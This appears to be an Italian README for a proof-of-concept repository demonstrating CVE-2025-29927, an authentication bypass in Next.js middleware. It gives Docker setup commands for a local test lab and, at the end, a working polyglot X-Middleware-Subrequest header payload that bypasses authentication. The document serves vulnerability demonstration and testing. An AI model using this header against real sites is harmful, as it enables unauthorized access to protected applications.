
PoC per CVE-2025-29927: Vulnerabilità di Bypass del Middleware di Next.js. Mostra come x-middleware-subrequest può bypassare i controlli di autenticazione. Include configurazione Docker per test.
Questo repository dimostra la vulnerabilità CVE-2025-29927 in Next.js, dove l'header interno x-middleware-subrequest può essere utilizzato per bypassare i controlli del middleware come l'autenticazione.
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
cd CVE-2025-29927-PoC
openssl rand -base64 32
.env:NEXTAUTH_SECRET=your_generated_secret
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
Possiamo semplificare notevolmente lo sfruttamento di questo problema utilizzando un poliglotta che ci permette di coprire efficacemente i vari casi potenziali. Ciò è stato ottenuto con il seguente header HTTP, utilizzato per verificare la presenza di un bypass dell'autenticazione:
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

